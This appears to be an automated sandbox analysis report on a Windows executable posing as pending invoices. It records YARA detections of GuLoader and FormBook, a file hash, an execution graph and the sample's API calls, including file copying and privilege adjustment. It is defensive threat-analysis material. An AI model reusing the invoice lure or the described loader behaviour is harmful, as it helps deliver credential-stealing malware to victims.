                                ETag: "baf81e0b861db1:0"
                                Server: Microsoft-IIS/8.5
                                Date: Fri, 10 Jan 2025 06:05:28 GMT
                                Content-Length: 287808



                                Target ID:0
                                Start time:01:04:58
                                Start date:10/01/2025
                                Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                                Imagebase:0x400000
                                File size:533'960 bytes
                                MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2241540149.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:01:05:22
                                Start date:10/01/2025
                                Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                                Imagebase:0x400000
                                File size:533'960 bytes
                                MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:23.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:19.6%
                                  Total number of Nodes:1565
                                  Total number of Limit Nodes:40
401b15 5327->5328 5329 40303e 17 API calls 5328->5329 5330 401b20 lstrlenW 5329->5330 5331 401b3c 5330->5331 5332 401b67 5330->5332 5331->5332 5336 406af5 lstrcpynW 5331->5336 5334 401b5b 5334->5332 5335 401b5f lstrlenW 5334->5335 5335->5332 5336->5334 5337 401c04 5338 403002 17 API calls 5337->5338 5339 401c0e 5338->5339 5340 403002 17 API calls 5339->5340 5341 401bb2 5340->5341 5342 73471000 5343 7347101b 5 API calls 5342->5343 5344 73471019 5343->5344 5345 401b88 5346 40303e 17 API calls 5345->5346 5347 401b8f 5346->5347 5348 40303e 17 API calls 5347->5348 5349 401b98 5348->5349 5350 401ba0 lstrcmpiW 5349->5350 5351 401ba8 lstrcmpW 5349->5351 5352 401bae 5350->5352 5351->5352 3911 404b0b 3912 404cb4 3911->3912 3913 404b28 GetDlgItem GetDlgItem GetDlgItem 3911->3913 3915 404d00 3912->3915 3916 404cbc GetDlgItem CreateThread CloseHandle 3912->3916 3957 4054de SendMessageW 3913->3957 3919 404d31 3915->3919 3920 404d08 3915->3920 3918 404ce8 3916->3918 3991 40583f OleInitialize 3916->3991 3917 404ba1 3927 404ba8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3917->3927 3962 405736 3918->3962 3921 404d39 3919->3921 3922 404d7f 3919->3922 3920->3918 3924 404d14 ShowWindow ShowWindow 3920->3924 3925 404d42 3921->3925 3926 404d55 ShowWindow 3921->3926 3922->3918 3932 404d92 SendMessageW 3922->3932 3976 4054de SendMessageW 3924->3976 3977 405933 3925->3977 3926->3925 3929 404d6c 3926->3929 3930 404bf8 SendMessageW SendMessageW 3927->3930 3931 404c0c 3927->3931 3980 405d15 3929->3980 3930->3931 3935 404c14 SendMessageW 3931->3935 3936 404c1e 3931->3936 3937 404cf6 3932->3937 3938 404db0 CreatePopupMenu 3932->3938 3935->3936 3958 4054f5 3936->3958 3941 405e95 17 API calls 3938->3941 3939 404d2f 3939->3918 3942 404dc2 AppendMenuW 3941->3942 3946 404de4 GetWindowRect 3942->3946 3947 404df8 TrackPopupMenu 3942->3947 3943 404c30 3944 404c39 ShowWindow 3943->3944 3945 404c6b GetDlgItem SendMessageW 3943->3945 3948 404c5a 3944->3948 3949 404c4f ShowWindow 3944->3949 
3945->3937 3951 404c97 SendMessageW SendMessageW 3945->3951 3946->3947 3947->3937 3950 404e1a 3947->3950 3961 4054de SendMessageW 3948->3961 3949->3948 3952 404e2e SendMessageW 3950->3952 3951->3937 3952->3952 3954 404e4a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3952->3954 3955 404e76 SendMessageW 3954->3955 3955->3955 3956 404ea4 GlobalUnlock SetClipboardData CloseClipboard 3955->3956 3956->3937 3957->3917 3959 405e95 17 API calls 3958->3959 3960 405500 SetDlgItemTextW 3959->3960 3960->3943 3961->3945 3963 405804 3962->3963 3964 40574e GetWindowLongW 3962->3964 3963->3937 3964->3963 3965 405763 3964->3965 3965->3963 3966 405797 3965->3966 3967 40578b GetSysColor 3965->3967 3968 4057a5 SetBkMode 3966->3968 3969 40579b SetTextColor 3966->3969 3967->3966 3970 4057cd 3968->3970 3971 4057be GetSysColor 3968->3971 3969->3968 3972 4057d1 SetBkColor 3970->3972 3973 4057de 3970->3973 3971->3970 3972->3973 3973->3963 3974 4057f7 CreateBrushIndirect 3973->3974 3975 4057ee DeleteObject 3973->3975 3974->3963 3975->3974 3976->3939 3978 405940 SendMessageW 3977->3978 3979 40593a 3977->3979 3978->3939 3979->3978 3981 405d27 3980->3981 3986 405ddd 3980->3986 3982 405d46 lstrlenW 3981->3982 3983 405e95 17 API calls 3981->3983 3984 405d58 lstrlenW 3982->3984 3987 405d7b 3982->3987 3983->3982 3985 405d6d lstrcatW 3984->3985 3984->3986 3985->3987 3986->3925 3988 405d92 3987->3988 3989 405d85 SetWindowTextW 3987->3989 3988->3986 3990 405d97 SendMessageW SendMessageW SendMessageW 3988->3990 3989->3988 3990->3986 3998 4054c3 3991->3998 3993 405889 3994 4054c3 SendMessageW 3993->3994 3995 40589b OleUninitialize 3994->3995 3996 405862 3996->3993 4001 401399 3996->4001 3999 4054db 3998->3999 4000 4054cc SendMessageW 3998->4000 3999->3996 4000->3999 4002 401413 4001->4002 4004 4013a3 4001->4004 4002->3996 4004->4002 4005 4013df MulDiv SendMessageW 4004->4005 4006 40154a 4004->4006 4005->4004 4007 4015c3 4006->4007 4116 4015ce 4006->4116 4008 4016c1 4007->4008 4009 4017c2 
4007->4009 4010 4015e6 4007->4010 4011 4018cb 4007->4011 4012 40160c 4007->4012 4013 4016ef 4007->4013 4014 4016af 4007->4014 4015 40182f 4007->4015 4016 401711 4007->4016 4017 401633 SetForegroundWindow 4007->4017 4018 4017d3 4007->4018 4019 401618 4007->4019 4020 4015f9 4007->4020 4021 40189b 4007->4021 4022 4018de 4007->4022 4023 40163f 4007->4023 4115 4015d5 4007->4115 4007->4116 4028 4016d1 ShowWindow 4008->4028 4029 4016d9 4008->4029 4032 40303e 17 API calls 4009->4032 4031 4015f0 PostQuitMessage 4010->4031 4010->4116 4036 40303e 17 API calls 4011->4036 4048 405d15 24 API calls 4012->4048 4030 40303e 17 API calls 4013->4030 4158 4065fa wsprintfW 4014->4158 4026 40303e 17 API calls 4015->4026 4033 40303e 17 API calls 4016->4033 4017->4116 4035 40303e 17 API calls 4018->4035 4024 403002 17 API calls 4019->4024 4054 401399 77 API calls 4020->4054 4034 40303e 17 API calls 4021->4034 4025 40303e 17 API calls 4022->4025 4049 403002 17 API calls 4023->4049 4023->4116 4037 40161e Sleep 4024->4037 4038 4018e5 4025->4038 4039 401835 GetFullPathNameW 4026->4039 4028->4029 4040 4016e6 ShowWindow 4029->4040 4029->4116 4042 4016f6 SetFileAttributesW 4030->4042 4031->4116 4043 4017c8 4032->4043 4044 401718 4033->4044 4045 4018a2 SearchPathW 4034->4045 4046 4017da 4035->4046 4047 4018d2 4036->4047 4037->4116 4059 401906 4038->4059 4060 40190e 4038->4060 4050 401857 4039->4050 4051 40184d 4039->4051 4040->4116 4041 405d15 24 API calls 4041->4116 4042->4116 4162 4065aa FindFirstFileW 4043->4162 4117 406ba0 CharNextW CharNextW 4044->4117 4045->4116 4055 40303e 17 API calls 4046->4055 4132 406a31 4047->4132 4048->4116 4049->4116 4050->4051 4067 4065aa 2 API calls 4050->4067 4061 401889 GetShortPathNameW 4051->4061 4051->4116 4054->4116 4057 4017e3 4055->4057 4058 40303e 17 API calls 4057->4058 4063 4017ec MoveFileW 4058->4063 4170 406af5 lstrcpynW 4059->4170 4171 406af5 lstrcpynW 4060->4171 4061->4116 4062 401780 4062->4012 4066 401790 4062->4066 4063->4012 4069 401804 
4063->4069 4072 405d15 24 API calls 4066->4072 4073 40186a 4067->4073 4068 4065d1 CharNextW 4084 401720 4068->4084 4076 4065aa 2 API calls 4069->4076 4069->4116 4070 40190c 4079 406d18 5 API calls 4070->4079 4071 401919 4172 406531 lstrlenW CharPrevW 4071->4172 4075 401797 4072->4075 4073->4051 4169 406af5 lstrcpynW 4073->4169 4131 406af5 lstrcpynW 4075->4131 4083 401814 4076->4083 4108 40192b 4079->4108 4083->4116 4165 406218 MoveFileExW 4083->4165 4084->4062 4084->4068 4087 401769 GetFileAttributesW 4084->4087 4123 4064d7 4084->4123 4126 405e19 CreateDirectoryW 4084->4126 4159 405df9 CreateDirectoryW 4084->4159 4085 4017a2 SetCurrentDirectoryW 4085->4116 4087->4084 4089 4065aa 2 API calls 4089->4108 4090 401968 4175 406b78 GetFileAttributesW 4090->4175 4093 40193f CompareFileTime 4093->4108 4094 401a18 4095 405d15 24 API calls 4094->4095 4098 401a24 4095->4098 4096 4019fd 4097 405d15 24 API calls 4096->4097 4097->4116 4137 403148 4098->4137 4100 406af5 lstrcpynW 4100->4108 4102 401a52 SetFileTime 4104 401a60 CloseHandle 4102->4104 4103 405e95 17 API calls 4103->4108 4105 401a73 4104->4105 4104->4116 4106 401a78 4105->4106 4107 401a89 4105->4107 4109 405e95 17 API calls 4106->4109 4110 405e95 17 API calls 4107->4110 4108->4089 4108->4090 4108->4093 4108->4094 4108->4096 4108->4100 4108->4103 4108->4115 4136 4068f6 GetFileAttributesW CreateFileW 4108->4136 4178 406a83 4108->4178 4112 401a80 lstrcatW 4109->4112 4113 401a91 4110->4113 4112->4113 4114 406a83 MessageBoxIndirectW 4113->4114 4114->4116 4115->4041 4115->4116 4116->4004 4118 406bbe 4117->4118 4122 406bf5 4117->4122 4119 406bcd CharNextW 4118->4119 4120 406bd2 4118->4120 4119->4122 4121 4065d1 CharNextW 4120->4121 4120->4122 4121->4120 4122->4084 4182 4068c1 GetModuleHandleA 4123->4182 4127 405e64 GetLastError 4126->4127 4128 405e87 4126->4128 4127->4128 4129 405e71 SetFileSecurityW 4127->4129 4128->4084 4129->4128 4130 405e8b GetLastError 4129->4130 4130->4128 4131->4085 4133 406a3e GetTickCount 
GetTempFileNameW 4132->4133 4134 406a72 4133->4134 4135 406a76 4133->4135 4134->4133 4134->4135 4135->4116 4136->4108 4138 403190 4137->4138 4139 403183 4137->4139 4191 406923 ReadFile 4138->4191 4206 403131 SetFilePointer 4139->4206 4143 4032f6 4145 40333d 4143->4145 4149 4032fa 4143->4149 4144 4031b6 GetTickCount 4154 4031ca 4144->4154 4146 40311b ReadFile 4145->4146 4152 401a3a 4146->4152 4147 40311b ReadFile 4147->4149 4149->4147 4150 4069e6 WriteFile 4149->4150 4149->4152 4150->4149 4152->4102 4152->4104 4153 40323a GetTickCount 4153->4154 4154->4152 4154->4153 4155 40326b MulDiv wsprintfW 4154->4155 4193 40311b 4154->4193 4196 406e83 4154->4196 4204 4069e6 WriteFile 4154->4204 4156 405d15 24 API calls 4155->4156 4156->4154 4158->4116 4160 405e13 4159->4160 4161 405e0b GetLastError 4159->4161 4160->4084 4161->4160 4163 4065c0 FindClose 4162->4163 4164 4065cb 4162->4164 4163->4164 4164->4116 4166 406239 4165->4166 4167 40622c 4165->4167 4166->4012 4207 4062e1 4167->4207 4169->4051 4170->4070 4171->4071 4173 40191f lstrcatW 4172->4173 4174 40654e lstrcatW 4172->4174 4173->4070 4174->4173 4176 406b9a 4175->4176 4177 406b8a SetFileAttributesW 4175->4177 4176->4108 4177->4176 4180 406a98 4178->4180 4179 406ae6 4179->4108 4180->4179 4181 406aae MessageBoxIndirectW 4180->4181 4181->4179 4183 4068e3 GetProcAddress 4182->4183 4184 4068d9 4182->4184 4185 4064de 4183->4185 4188 406179 GetSystemDirectoryW 4184->4188 4185->4084 4187 4068df 4187->4183 4187->4185 4189 40619b wsprintfW LoadLibraryExW 4188->4189 4189->4187 4192 4031a2 4191->4192 4192->4143 4192->4144 4192->4152 4194 406923 ReadFile 4193->4194 4195 40312e 4194->4195 4195->4154 4197 406eae 4196->4197 4201 406ea6 4196->4201 4198 406fe9 4197->4198 4199 406fc5 GlobalFree 4197->4199 4200 406fcf GlobalAlloc 4197->4200 4197->4201 4198->4198 4198->4201 4202 407055 GlobalFree 4198->4202 4203 40705c GlobalAlloc 4198->4203 4199->4200 4200->4198 4200->4201 4201->4154 4202->4203 4203->4201 4205 406a07 4204->4205 4205->4154 
4206->4138 4208 406311 4207->4208 4209 406337 GetShortPathNameW 4207->4209 4234 4068f6 GetFileAttributesW CreateFileW 4208->4234 4210 406417 4209->4210 4211 40634c 4209->4211 4210->4166 4211->4210 4214 406354 wsprintfA 4211->4214 4213 40631b CloseHandle GetShortPathNameW 4213->4210 4215 40632f 4213->4215 4216 405e95 17 API calls 4214->4216 4215->4209 4215->4210 4217 40637d 4216->4217 4235 4068f6 GetFileAttributesW CreateFileW 4217->4235 4219 40638a 4219->4210 4220 406395 GetFileSize GlobalAlloc 4219->4220 4221 406410 CloseHandle 4220->4221 4222 4063b4 4220->4222 4221->4210 4223 406923 ReadFile 4222->4223 4224 4063bc 4223->4224 4224->4221 4236 406b11 lstrlenA lstrlenA 4224->4236 4227 40641c 4229 406b11 3 API calls 4227->4229 4228 4063cf lstrcpyA 4231 4063e1 4228->4231 4229->4231 4230 4063f2 SetFilePointer 4232 4069e6 WriteFile 4230->4232 4231->4230 4233 406409 GlobalFree 4232->4233 4233->4221 4234->4213 4235->4219 4237 4063cb 4236->4237 4238 406b30 4236->4238 4237->4227 4237->4228 4238->4237 4239 406b5d lstrlenA 4238->4239 4239->4237 4239->4238 5353 73471b0a 5354 73471b38 5353->5354 5355 73472351 21 API calls 5354->5355 5356 73471b3f 5355->5356 5357 73471b46 5356->5357 5358 73471b52 5356->5358 5359 734715eb 2 API calls 5357->5359 5360 73471b73 5358->5360 5361 73471b5c 5358->5361 5369 73471b50 5359->5369 5362 73471b9f 5360->5362 5363 73471b79 5360->5363 5364 734715c5 3 API calls 5361->5364 5366 734715c5 3 API calls 5362->5366 5365 73471668 3 API calls 5363->5365 5367 73471b61 5364->5367 5368 73471b7e 5365->5368 5366->5369 5370 73471668 3 API calls 5367->5370 5372 734715eb 2 API calls 5368->5372 5371 73471b67 5370->5371 5373 734715eb 2 API calls 5371->5373 5374 73471b84 GlobalFree 5372->5374 5375 73471b6d GlobalFree 5373->5375 5374->5369 5374->5375 5377 401e8e 5378 403002 17 API calls 5377->5378 5379 401e94 IsWindow 5378->5379 5380 401bb2 5379->5380 5381 404f0e 5382 404f32 5381->5382 5383 404f1a 5381->5383 5385 404f66 5382->5385 5386 404f38 SHGetPathFromIDListW 
5382->5386 5391 406a15 GetDlgItemTextW 5383->5391 5387 404f27 SendMessageW 5386->5387 5388 404f48 5386->5388 5387->5385 5389 401533 94 API calls 5388->5389 5389->5387 5391->5387 5392 40211b 5393 40303e 17 API calls 5392->5393 5394 402121 5393->5394 5395 405d15 24 API calls 5394->5395 5396 40212b 5395->5396 5397 4066b1 2 API calls 5396->5397 5398 402131 5397->5398 5399 40215b 5398->5399 5401 4064ef 5 API calls 5398->5401 5402 401709 5398->5402 5400 402110 CloseHandle 5399->5400 5399->5402 5400->5402 5403 40214b 5401->5403 5403->5399 5405 4065fa wsprintfW 5403->5405 5405->5399 4876 40291d 4877 403002 17 API calls 4876->4877 4884 40292e 4877->4884 4878 402aa2 SetFilePointer 4879 402aee 4881 402980 ReadFile 4881->4878 4881->4884 4882 406923 ReadFile 4882->4884 4883 402a3d 4883->4878 4883->4884 4890 40645f SetFilePointer 4883->4890 4884->4878 4884->4879 4884->4881 4884->4882 4884->4883 4885 402ae4 4884->4885 4886 4029c5 MultiByteToWideChar 4884->4886 4889 4029f6 SetFilePointer MultiByteToWideChar 4884->4889 4899 4065fa wsprintfW 4885->4899 4886->4884 4889->4884 4891 40647b 4890->4891 4892 406496 4890->4892 4893 406923 ReadFile 4891->4893 4892->4883 4894 406487 4893->4894 4894->4892 4895 4064c7 SetFilePointer 4894->4895 4896 40649f SetFilePointer 4894->4896 4895->4892 4896->4895 4897 4064aa 4896->4897 4898 4069e6 WriteFile 4897->4898 4898->4892 4899->4879 5406 40219d 5407 40303e 17 API calls 5406->5407 5408 4021a4 5407->5408 5409 4068c1 5 API calls 5408->5409 5410 4021b5 5409->5410 5411 402ea5 5410->5411 5412 4021ce GlobalAlloc 5410->5412 5412->5411 5413 4021e3 5412->5413 5414 4068c1 5 API calls 5413->5414 5415 4021ea 5414->5415 5416 4068c1 5 API calls 5415->5416 5417 4021f3 5416->5417 5418 40224e GlobalFree 5417->5418 5423 4065fa wsprintfW 5417->5423 5418->5411 5420 402237 5424 4065fa wsprintfW 5420->5424 5422 40224c 5422->5418 5423->5420 5424->5422 5425 73471aa7 5426 7347156c GlobalFree 5425->5426 5429 73471abf 5426->5429 5427 73471b01 GlobalFree 5428 73471add 
5428->5427 5429->5427 5429->5428 5430 73471aed VirtualFree 5429->5430 5430->5427 5431 401aa1 5432 401aa2 5431->5432 5433 40303e 17 API calls 5432->5433 5434 401aa7 5433->5434 5435 4066f4 66 API calls 5434->5435 5436 401ab1 5435->5436 5437 403d23 5438 403d2e 5437->5438 5439 403d32 5438->5439 5440 403d35 GlobalAlloc 5438->5440 5440->5439 5441 402ba3 5442 40303e 17 API calls 5441->5442 5443 402bb2 5442->5443 5444 402bc9 5443->5444 5445 40303e 17 API calls 5443->5445 5446 406b78 2 API calls 5444->5446 5445->5444 5447 402bcf 5446->5447 5469 4068f6 GetFileAttributesW CreateFileW 5447->5469 5449 402bdc 5450 402cb7 5449->5450 5453 402bfd GlobalAlloc 5449->5453 5456 402c9f 5449->5456 5451 402cc0 DeleteFileW 5450->5451 5452 402ccf 5450->5452 5451->5452 5455 402c1d 5453->5455 5453->5456 5454 403148 35 API calls 5458 402cac CloseHandle 5454->5458 5470 403131 SetFilePointer 5455->5470 5456->5454 5458->5450 5459 402c23 5460 40311b ReadFile 5459->5460 5461 402c2d GlobalAlloc 5460->5461 5462 402c43 5461->5462 5463 402c84 5461->5463 5464 403148 35 API calls 5462->5464 5465 4069e6 WriteFile 5463->5465 5468 402c52 5464->5468 5466 402c93 GlobalFree 5465->5466 5466->5456 5467 402c7a GlobalFree 5467->5463 5468->5467 5469->5449 5470->5459 3876 402728 3887 4030c1 3876->3887 3881 402748 RegQueryValueExW 3882 402772 3881->3882 3883 40276b 3881->3883 3884 40271c RegCloseKey 3882->3884 3886 401709 3882->3886 3883->3882 3897 4065fa wsprintfW 3883->3897 3884->3886 3888 40303e 17 API calls 3887->3888 3889 4030d9 3888->3889 3890 4062b3 RegOpenKeyExW 3889->3890 3891 402732 3890->3891 3892 40303e 3891->3892 3893 405e95 17 API calls 3892->3893 3894 403067 3893->3894 3895 40273b 3894->3895 3898 406d18 3894->3898 3895->3881 3895->3886 3897->3882 3905 406d2d 3898->3905 3899 406daf 3900 406db7 CharPrevW 3899->3900 3903 406dd7 3899->3903 3900->3899 3901 406da0 CharNextW 3901->3899 3901->3905 3903->3895 3904 406d8c CharNextW 3904->3905 3905->3899 3905->3901 3905->3904 3906 406d9b CharNextW 3905->3906 3907 
4065d1 3905->3907 3906->3901 3908 4065f7 3907->3908 3909 4065dd 3907->3909 3908->3905 3909->3908 3910 4065e6 CharNextW 3909->3910 3910->3908 3910->3909 5471 402b28 5472 402b2e 5471->5472 5473 402b36 FindClose 5472->5473 5474 402ea1 5472->5474 5473->5474 5475 40362a 5476 403650 5475->5476 5477 40363c SetTimer 5475->5477 5478 403659 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5476->5478 5479 4036a7 5476->5479 5477->5478 5478->5479 5480 4058ab 5481 4058c0 5480->5481 5482 4058d4 5480->5482 5483 4058c6 5481->5483 5484 405919 CallWindowProcW 5481->5484 5485 4058f3 5482->5485 5486 4058dc IsWindowVisible 5482->5486 5488 4054c3 SendMessageW 5483->5488 5487 4058d0 5484->5487 5485->5484 5491 405491 94 API calls 5485->5491 5486->5484 5489 4058e9 5486->5489 5488->5487 5490 4056b5 5 API calls 5489->5490 5490->5485 5491->5484 5492 4025ac 5493 40303e 17 API calls 5492->5493 5494 4025bd 5493->5494 5495 40303e 17 API calls 5494->5495 5496 4025c6 5495->5496 5497 40303e 17 API calls 5496->5497 5498 4025cf GetPrivateProfileStringW 5497->5498 5499 4025f4 5498->5499 5500 401ead 5501 403002 17 API calls 5500->5501 5502 401eb4 5501->5502 5503 403002 17 API calls 5502->5503 5504 401ebd GetDlgItem 5503->5504 4338 4027b0 4339 4030c1 17 API calls 4338->4339 4340 4027ba 4339->4340 4341 403002 17 API calls 4340->4341 4342 4027c3 4341->4342 4343 4027d5 4342->4343 4347 401709 4342->4347 4344 4027f0 RegEnumValueW 4343->4344 4345 4027e4 RegEnumKeyW 4343->4345 4346 40280e RegCloseKey 4344->4346 4345->4346 4346->4347 5505 405630 lstrcpynW lstrlenW 5506 401ab6 5507 40303e 17 API calls 5506->5507 5508 401abd 5507->5508 5509 406a83 MessageBoxIndirectW 5508->5509 5510 401709 5509->5510 5511 402837 5512 40303e 17 API calls 5511->5512 5515 401afd 5512->5515 5514 402855 5515->5511 5515->5514 5516 4068f6 GetFileAttributesW CreateFileW 5515->5516 5516->5515 5517 401fb8 GetDC 5518 403002 17 API calls 5517->5518 5519 401fc8 GetDeviceCaps MulDiv ReleaseDC 5518->5519 5520 403002 17 API calls 5519->5520 5521 
401ff8 5520->5521 5522 405e95 17 API calls 5521->5522 5523 402032 CreateFontIndirectW 5522->5523 5524 73472ebf 5525 73472ed7 5524->5525 5526 73471309 2 API calls 5525->5526 5527 73472ef2 5526->5527 5528 401dba 5529 403002 17 API calls 5528->5529 5530 401dc1 5529->5530 5531 403002 17 API calls 5530->5531 5532 401dce 5531->5532 5533 401de1 5532->5533 5535 40303e 17 API calls 5532->5535 5534 401df6 5533->5534 5536 40303e 17 API calls 5533->5536 5537 401e50 5534->5537 5538 401e01 5534->5538 5535->5533 5536->5534 5540 40303e 17 API calls 5537->5540 5539 403002 17 API calls 5538->5539 5541 401e06 5539->5541 5542 401e55 5540->5542 5544 403002 17 API calls 5541->5544 5543 40303e 17 API calls 5542->5543 5545 401e5e FindWindowExW 5543->5545 5546 401e11 5544->5546 5549 401e7b 5545->5549 5547 401e41 SendMessageW 5546->5547 5548 401e1e SendMessageTimeoutW 5546->5548 5547->5549 5548->5549 5550 401bbb 5551 40303e 17 API calls 5550->5551 5552 401bc4 ExpandEnvironmentStringsW 5551->5552 5553 401bd7 5552->5553 5555 401be9 5552->5555 5554 401bdd lstrcmpW 5553->5554 5553->5555 5554->5555 5556 7347103a 5557 73471052 5556->5557 5558 734710c5 5557->5558 5559 73471081 5557->5559 5560 73471061 5557->5560 5562 7347156c GlobalFree 5559->5562 5561 7347156c GlobalFree 5560->5561 5563 73471072 5561->5563 5566 73471079 5562->5566 5564 7347156c GlobalFree 5563->5564 5564->5566 5565 73471091 GlobalSize 5567 7347109a 5565->5567 5566->5565 5566->5567 5568 734710af 5567->5568 5569 7347109e GlobalAlloc 5567->5569 5571 734710b8 GlobalFree 5568->5571 5570 734715c5 3 API calls 5569->5570 5570->5568 5571->5558

                                  Control-flow Graph (legend: Executed / Not Executed; graph not reproduced)
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008001), ref: 004036F3
                                  • GetVersionExW.KERNEL32 ref: 0040371C
                                  • GetVersionExW.KERNEL32(?), ref: 0040372F
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                  • OleInitialize.OLE32(00000000), ref: 00403818
                                  • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                  • GetCommandLineW.KERNEL32(Tolkningen Setup,NSIS Error), ref: 0040384C
                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 00403898
                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403996
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039A7
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B3
                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C7
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039CF
                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E0
                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                  • DeleteFileW.KERNELBASE(1033), ref: 00403A02
                                    • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                    • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AA5
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AB8
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AC7
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AD6
                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AFE
                                  • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,004209C0,?), ref: 00403B63
                                  • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                    • Part of subcall function 00405DF9: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                    • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                  • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                  • ExitProcess.KERNEL32 ref: 00403BE1
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                  • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                    • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 004065E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmp
